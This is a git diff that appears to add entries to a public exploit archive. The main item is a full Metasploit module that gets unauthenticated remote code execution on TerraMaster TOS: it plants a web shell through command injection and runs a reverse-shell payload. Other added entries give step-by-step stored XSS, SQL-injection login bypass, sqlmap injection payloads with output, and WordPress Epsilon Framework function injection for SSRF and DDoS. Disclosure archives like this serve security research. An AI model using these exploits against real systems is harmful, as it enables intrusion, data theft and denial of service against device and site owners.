diff --git a/exploits/linux/webapps/49330.rb b/exploits/linux/webapps/49330.rb new file mode 100755 index 000000000..846ea8cd2 --- /dev/null +++ b/exploits/linux/webapps/49330.rb @@ -0,0 +1,120 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution", + 'Description' => %q( + This module exploits a unauthenticated command execution vulnerability in TerraMaster TOS. + The "Event" parameter in "include/makecvs.php" contains a vulnerability. + "filename" is executing command on system during ".csv" creation. + In order to do this, it is not necessary to have a session in the application. + Therefore an unathenticated user can execute the command on the system. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkkuS <Özkan Mustafa Akkuş>', #PoC & Metasploit module + 'IHTeam' # Discovery + ], + 'References' => + [ + ['CVE', '2020-'], + ['URL', 'http://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html'], + ['URL', 'https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => "Dec 12 2020", + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'RPORT' => 8181, + 'SSL' => false, + 'PAYLOAD' => 'cmd/unix/reverse_perl' })) + + register_options( + [ + OptString.new('TARGETURI', [true, "Base ERP directory path", '/']) + ] + ) + end + + def run_cmd(file,cmd) + + res = send_request_cgi( + { + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, "#{file}"), + 'data' => "cmd=#{cmd}" + }) + end + + def upload_shell + sname = Rex::Text.rand_text_alpha_lower(8) + ".php" + payload_post = "http|echo \"\" >> /usr/www/#{sname} && chmod +x /usr/www/#{sname}||" + @b64p = Rex::Text.encode_base64(payload.encoded) + perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"' + payload = Rex::Text.uri_encode(perl_payload) + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "include", "makecvs.php"), + 'vars_get' => { + 'Event' => "#{payload_post}", + } + ) + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "#{sname}"), + 'vars_post' => { + 'cmd' => 'id' + } + ) + + if res && res.code == 200 && res.body.include?('uid=') + print_good("Upload completed successfully and command executed!") + run_cmd("#{sname}",payload) + else + fail_with(Failure::NoAccess, 'Error occurred during uploading!') + end + end + + def exploit + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + upload_shell + end + + def check + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "version"), + ) + + if res && res.code == 200 && res.body + version = res.body.split(".0_")[1] + print_status("Version : " + res.body) + return CheckCode::Detected if version.nil? + version = version.split(".").join('') + if version <= "4206" + return CheckCode::Vulnerable + else + return CheckCode::Safe + end + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/49323.txt b/exploits/php/webapps/49323.txt new file mode 100644 index 000000000..69ea18f6f --- /dev/null +++ b/exploits/php/webapps/49323.txt @@ -0,0 +1,33 @@ +# Exploit Title: Class Scheduling System 1.0 - Multiple Stored XSS +# Exploit Author: Aakash Madaan (Godsky) +# Date: 2020-12-22 +# Vendor Homepage: https://www.sourcecodester.com/php/5175/class-scheduling-system.html +# Software Link: https://www.sourcecodester.com/download-code?nid=5175&title=Class+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Category: Web Application +# Tested on: Parrot OS + +[+] Step 1. Login to the application with admin credentials + +[+] Step 2.1(a). Click on "Department" page. {Uri :http(s):///admin/department.php} + Step 2.1(b). In the "Person Incharge" field, use XSS payload '">' as the name of new course and click on save. + [ Note : The XSS can also be triggered if we put the same payload in "Title" field ] + Step 2.1(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS Payloads will be triggered. + +[+] Step 2.2(a). Click on "Subject" page. {Uri :http(s):///admin/subject.php} + Step 2.2(b). In the "Subject Code" field, use XSS payload '">' as the name of new course and click on save. + [ Note : The XSS can also be triggered if we put the same payload in "Title" field ] + Step 2.2(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Subject", your XSS Payloads will be triggered. + +[+] Step 2.3(a). Click on "Course" page. {Uri : +http(s):///admin/course.php} + Step 2.3(b). In the "Course Year" field, use XSS payload '">' as the name of new course and click on save. + [ Note : The XSS can also be triggered if we put the same payload in "Major" field ] + Step 2.3(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Course", your XSS Payloads will be triggered. + +[+] Step 2.3(a). Click on "Record" page. {Uri :http(s):///admin/record.php} + Step 2.3(b). In the "Name" field, use XSS payload '">' as the name of new course and click onsave. + [ Note : The XSS can also be triggered if we put the same payload in "Academic Rank" or "Designation" field ] + Step 2.3(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Record", your XSS Payloads will be triggered. + +[+] Step 3. This should trigger the XSS payload and anytime you click on respective pages, your stored XSS payload will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49324.txt b/exploits/php/webapps/49324.txt new file mode 100644 index 000000000..6acd1cb61 --- /dev/null +++ b/exploits/php/webapps/49324.txt @@ -0,0 +1,19 @@ +# Exploit Title: Online Learning Management System 1.0 - Authentication Bypass +# Exploit Author: Aakash Madaan (Godsky) +# Date: 2020-12-22 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html +# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Category: Web Application +# Tested on: Parrot OS +# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as the registered user without password. + +Step 1: Go to http://localhost/ and register a new user or try to login as +already registered user (Ubas). + +Step 2: On the login page, use query { Ubas' or '1'='1 } as username + +Step 2: On the login page, use same query { Ubas' or '1'='1 } as password + +All set you should be logged in as Ubas. \ No newline at end of file diff --git a/exploits/php/webapps/49325.txt b/exploits/php/webapps/49325.txt new file mode 100644 index 000000000..18c8fb985 --- /dev/null +++ b/exploits/php/webapps/49325.txt @@ -0,0 +1,54 @@ +# Exploit Title: Online Learning Management System 1.0 - Multiple Stored XSS +# Exploit Author: Aakash Madaan (Godsky) +# Date: 2020-12-22 +# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html +# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Category: Web Application +# Tested on: Parrot OS + +[+] Step 1. Login to the application with admin credentials + + +[+] Step 2.1 + + (a). Click on "Subject" page. {Uri :http(s):///admin/subject.php} + (b). Now click on the "Add Subject" button to add a new subject. + (c). In the "Subject Title" field, use XSS payload '">' as the name of new course (Also fill the respective sections if required). + (d). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Subject" section, your XSS Payloads will be triggered. + +[+] Step 2.2 + + (a). Click on "Class" page. {Uri : http(s):///admin/class.php} + (b). Under the "Add class" in the "Class Name" field, use XSS payload '">' as the name of new course. + (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Class" section, your XSS Payloads will be triggered. + +[+] Step 2.3 + + (a). Click on "Admin Users" page. {Uri :http(s):///admin/admin_user.php} + (b). Under the "Add user" in the "First Name" field, use XSS payload '">' as the name of new course (Also fill the respective sections if required). + [ Note : The XSS can also be triggered if we put the same payload in "Last Name" or "Username" fields ] + (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Admin Users", your XSS Payloads will be triggered. + +[+] Step 2.4 + + (a). Click on "Department" page. {Uri :http(s):///admin/department.php} + (b). In the "Department" field, use XSS payload '">' as the name of new course (Also fill the respective sections if required). + [ Note : The XSS can also be triggered if we put the same payload in "Person Incharge" field ] + (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS Payloads will be triggered. + +[+] Step 2.5 + + (a). Click on "Students" page. {Uri :http(s):///admin/students.php} + (b). Under "Add Student" in the "First Name" field, use XSS payload '">' as the name of new course (Also fill the respective sections if required). + [ Note : The XSS can also be triggered if we put the same payload in "Last Name" field ] + (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Students", your XSS Payloads will be triggered. + +[+] Step 2.6 + + (a). Click on "Teachers" page. {Uri :http(s):///admin/teachers.php} + (b). Under "Add Student" in the "First Name" field, use XSS payload '">' as the name of new course (Also fill the respective sections if required). + [ Note : The XSS can also be triggered if we put the same payload in "Last Name" field ] + (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Teachers", your XSS Payloads will be triggered. + +[+] Step 3. This should trigger the XSS payload and anytime you click on respective pages, your stored XSS payloads will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49326.txt b/exploits/php/webapps/49326.txt new file mode 100644 index 000000000..90432b7e1 --- /dev/null +++ b/exploits/php/webapps/49326.txt @@ -0,0 +1,55 @@ +# Exploit Title: Online Learning Management System 1.0 - 'id' SQL Injection +# Exploit Author: Aakash Madaan (Godsky) +# Date: 2020-12-22 +# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html +# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Category: Web Application +# Tested on: Parrot OS + +Step 1. Login to the application with admin credentials + +Step 2. Click on "Departments" page. + +Step 3. Choose any event and select "edit". The url should be "http(s):///admin/edit_department.php?id=4" + +Step 4. Capture the request to the "edit" event page in burpsuite. + +Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs + +--- +Parameter: id (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=4' AND (SELECT 7775 FROM (SELECT(SLEEP(5)))vwwE) AND +'OoVY'='OoVY + + Type: UNION query + Title: Generic UNION query (NULL) - 3 columns + Payload: id=-9296' UNION ALL SELECT +NULL,NULL,CONCAT(0x716a707871,0x64766351487955536b5276427a5a416a764e6a4b46476a57704f6d73425368544153494e53525970,0x716a716a71)-- +- +--- +[16:01:08] [INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) +[16:01:08] [INFO] fetching database names +[16:01:12] [INFO] retrieved: 'information_schema' +[16:01:13] [INFO] retrieved: 'mysql' +[16:01:15] [INFO] retrieved: 'performance_schema' +[16:01:16] [INFO] retrieved: 'css' +[16:01:18] [INFO] retrieved: 'sales_inventory_db' +[16:01:19] [INFO] retrieved: 'rios_db' +[16:01:19] [INFO] retrieved: 'capstone' +available databases [7]: + +[*] capstone +[*] css +[*] information_schema +[*] mysql +[*] performance_schema +[*] rios_db +[*] sales_inventory_db + + +Step 6. Sqlmap should inject the web-app successfully which leads to +information disclosure \ No newline at end of file diff --git a/exploits/php/webapps/49327.js b/exploits/php/webapps/49327.js new file mode 100644 index 000000000..fe086b321 --- /dev/null +++ b/exploits/php/webapps/49327.js @@ -0,0 +1,161 @@ +# Exploit Title: Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection +# Date: 22/12/2020 +# Exploit Authors: gx1 lotar +# Vendor Homepage: https://wordpress.com/ +# Software Link: https://github.com/WordPress/WordPress +# Affected Themes: + + shapely - Fixed in version 1.2.9 + newsmag - Fixed in version 2.4.2 + activello - Fixed in version 1.4.2 + illdy - Fixed in version 2.1.7 + allegiant - Fixed in version 1.2.6 + newspaper-x - Fixed in version 1.3.2 + pixova-lite - Fixed in version 2.0.7 + brilliance - Fixed in version 1.3.0 + medzone-lite - Fixed in version 1.2.6 + regina-lite - Fixed in version 2.0.6 + transcend - Fixed in version 1.2.0 + affluent - Fixed in version 1.1.2 + bonkers - Fixed in version 1.0.6 + antreas - Fixed in version 1.0.7 + naturemag-lite - No known fix + +# Tested on: Wordpress 5.6 +# CVE : N/A + +# References: + +- https://wpscan.com/vulnerability/10417 +- https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/ +- https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/ +- https://developer.wordpress.org/reference/classes/requests/request_multiple/ + +Description: + +Fifteen WordPress themes use a vulnerable version of epsilon-framework that vulnerable to a critical unauthenticated function injection vulnerability, due to the lack of capability and CSRF nonce checks in AJAX actions. + +Technical Details: + +The vulnerability is present in epsilon_framework_ajax_action AJAX action that is accessible to all users, authenticated or not. +The function takes three POST user input, assign them to the $class, $method and $args variables and calls the class with arguments: + +================================================================ + + public function epsilon_framework_ajax_action() { + if ( 'epsilon_framework_ajax_action' !== $_POST['action'] ) { + wp_die( + json_encode( + array( + 'status' => false, + 'error' => 'Not allowed', + ) + ) + ); + } + + if ( count( $_POST['args']['action'] ) !== 2 ) { + wp_die( + json_encode( + array( + 'status' => false, + 'error' => 'Not allowed', + ) + ) + ); + } + + if ( ! class_exists( $_POST['args']['action'][0] ) ) { + wp_die( + json_encode( + array( + 'status' => false, + 'error' => 'Class does not exist', + ) + ) + ); + } + + $class = $_POST['args']['action'][0]; + $method = $_POST['args']['action'][1]; + $args = $_POST['args']['args']; + + $response = $class::$method( $args ); +================================================================ + +Nonce is checked only if it set. +As it is possible to observe, the vulnerability can be exploited if the attacker is able to use a class that contains a public static method that accept an array argument. +Useful methods should be investigated in the context of the targeted website, because they could depend by the installed plugins and themes. +On a wordpress instance, it is possible to store the list of classes containing public static methods by adding this code in epsilon_framework_ajax_action function: + +================================================================ +function testClasses() { + error_log("[+] IN TEST CLASSES"); + mkdir("/tmp/classes"); + foreach(get_declared_classes() as $c) { + mylog($c); + $f = fopen('/tmp/classes/'.$c, 'w'); + $reflection = new ReflectionClass($c); + $staticMethods = $reflection->getMethods(ReflectionMethod::IS_STATIC); + foreach($staticMethods as $sm) { + mylog($sm); + fwrite($f, $sm . "\n"); + } + fclose($f); + } + } + testClasses(); +=============================================================== + +We have found Requests::request_multiple static method(array $requests) in the core of Wordpress that can be used to send arbitrary HTTP requests, with critical dangerous effects for the vulnerable target. + +Proof Of Concept: + +The following code: + +=============================================================== + + + + +=============================================================== + +sends a request to : + +============================================================================================================================== +- - [22/Dec/2020:18:36:51 +0000] "GET / HTTP/1.1" 200 3898 "" "php-requests/1.7-3470169" +============================================================================================================================== + + +Impacts: + +1. DDOS amplification against a target: the attacker can exploit vulnerable wordpress sites to send ajax requests with args array containing multiple occurrences of the target. In this way, he can perform an amplification attack against a target website. + var data = { + 'action': 'epsilon_framework_ajax_action', + + 'args': { + 'action': ["Requests", "request_multiple"], + 'args' : [{"url": ""}, {"url": ""}, {"url": ""}, ...] + } + } + +2. SSRF: the attacker can exploit Requests::request_multiple method to perform a Server-Side Request Forgery and obtain access to internal network through vulnerable Wordpress site. +3. Wordpress DoS: if the attacker creates a specific POST request that contains a request to "/wp-admin/admin-ajax.php" as data he could be able to create an internal loop that crashes Wordpress site. + +Solution: +In Affected Themes we show the fixed versions. \ No newline at end of file diff --git a/exploits/php/webapps/49329.txt b/exploits/php/webapps/49329.txt new file mode 100644 index 000000000..5bc611548 --- /dev/null +++ b/exploits/php/webapps/49329.txt @@ -0,0 +1,16 @@ +# Exploit Title: Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS +# Exploit Author: Vijay Sachdeva (pwnshell) +# Date: 2020-12-23 +# Vendor Homepage: https://www.sourcecodester.com/php/11238/sales-and-inventory-system-grocery-store.html +# Software Link: https://www.sourcecodester.com/download-code?nid=11238&title=Sales+and+Inventory+System+for+Grocery+Store+using+PHP%2FPDO+Full+Source+Code +# Tested on Kali Linux + +Step 1: Log in to the application with admin credentials + +Step 2: Click on "Customer" on the left side, then click "Add Customer". + +Step 3. Input "">" in "First Name" field of the "Add Customer" form. + +Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Customer" page, your XSS payload will be triggered. + +Note: Stored XSS can also be found on the "Product" page, select any product and then go to "Action" to edit it. Input your payload "">" in any of the field and your XSS payload will trigger. \ No newline at end of file diff --git a/exploits/php/webapps/49331.txt b/exploits/php/webapps/49331.txt new file mode 100644 index 000000000..84fb4c302 --- /dev/null +++ b/exploits/php/webapps/49331.txt @@ -0,0 +1,83 @@ +# Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection +# Exploit Author: Vijay Sachdeva +# Date: 2020-12-23 +# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+ +# Affected Version: Version 1 +# Tested on Kali Linux + +Step 1. Log in to the application with admin credentials. + +Step 2. Click on "MENUS" on the left side and then edit any "Page Role". + +Step 3. On the edit page, the URL should be: http://localhost/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7 + +Step 4. Run sqlmap on the URL where the "roleid" parameter is given + +sqlmap -u " +http://192.168.1.240/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7" +--banner + +--- + +Parameter: roleid (GET) + + Type: boolean-based blind + + Title: AND boolean-based blind - WHERE or HAVING clause + + Payload: id=pagerole&action=edit&roleid=8' AND 3077=3077 AND +'IPDn'='IPDn + + + Type: error-based + + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + + Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 2834 FROM(SELECT +COUNT(*),CONCAT(0x7170767871,(SELECT +(ELT(2834=2834,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jnFT'='jnFT + + + Type: time-based blind + + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + + Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 4559 FROM +(SELECT(SLEEP(5)))jaEa) AND 'iBGT'='iBGT + + + Type: UNION query + + Title: Generic UNION query (NULL) - 4 columns + + Payload: id=pagerole&action=edit&roleid=-2488' UNION ALL SELECT +CONCAT(0x7170767871,0x7577594366596d7077424f5746685366434a5244775565756b7a41566d63546c5156564e6d67556e,0x71717a6271),NULL,NULL,NULL-- +- + +--- + +[05:32:00] [INFO] the back-end DBMS is MySQL + +[05:32:00] [INFO] fetching banner + +back-end DBMS: MySQL >= 5.0 (MariaDB fork) + +banner: '10.3.24-MariaDB-2' + +--- + +[08:18:34] [INFO] the back-end DBMS is MySQL + +[08:18:34] [INFO] fetching banner + +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) + +banner: '10.3.24-MariaDB-2' + + +--- + +Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 53ec6d295..dfccd4523 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43535,3 +43535,11 @@ id,file,description,date,author,type,platform,port 49319,exploits/php/webapps/49319.txt,"Artworks Gallery Management System 1.0 - 'id' SQL Injection",2020-12-22,"Vijay Sachdeva",webapps,php, 49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php, 49321,exploits/linux/webapps/49321.py,"TerraMaster TOS 4.2.06 - RCE (Unauthenticated)",2020-12-22,IHTeam,webapps,linux, +49323,exploits/php/webapps/49323.txt,"Class Scheduling System 1.0 - Multiple Stored XSS",2020-12-23,"Aakash Madaan",webapps,php, +49324,exploits/php/webapps/49324.txt,"Online Learning Management System 1.0 - Authentication Bypass",2020-12-23,"Aakash Madaan",webapps,php, +49325,exploits/php/webapps/49325.txt,"Online Learning Management System 1.0 - Multiple Stored XSS",2020-12-23,"Aakash Madaan",webapps,php, +49326,exploits/php/webapps/49326.txt,"Online Learning Management System 1.0 - 'id' SQL Injection",2020-12-23,"Aakash Madaan",webapps,php, +49327,exploits/php/webapps/49327.js,"Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection",2020-12-23,gx1,webapps,php, +49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php, +49330,exploits/linux/webapps/49330.rb,"TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution (Metasploit)",2020-12-23,AkkuS,webapps,linux, +49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,